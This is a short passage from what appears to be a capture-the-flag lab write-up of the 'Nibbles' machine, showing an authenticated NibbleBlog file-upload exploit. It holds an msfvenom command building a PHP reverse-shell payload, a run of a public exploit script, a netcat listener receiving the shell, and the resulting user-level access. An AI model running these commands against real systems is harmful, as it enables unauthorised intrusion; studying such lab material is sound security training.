3 fileUpload exploit

Using https://github.com/TheRealHetfield/exploits/blob/master/nibbleBlog_fileUpload.py

$ msfvenom -p php/reverse_perl --format raw -o nibble.txt LHOST=10.10.14.15 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1919 bytes
Saved as: nibble.txt

$ chmod +x nibbleBlog_fileUpload.py

$ ./nibbleBlog_fileUpload.py
[-] LOGIN RESPONSE: 200 OK
[+] Login Successful.
[-] Upload likely successful.
[-] UPLOAD RESPONSE: 200 OK
[+] Exploit launched, check for shell.
[-] EXPLOIT RESPONSE: 200 OK

$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.75] 52620
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$
whoami;id
nibbler
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

Last updated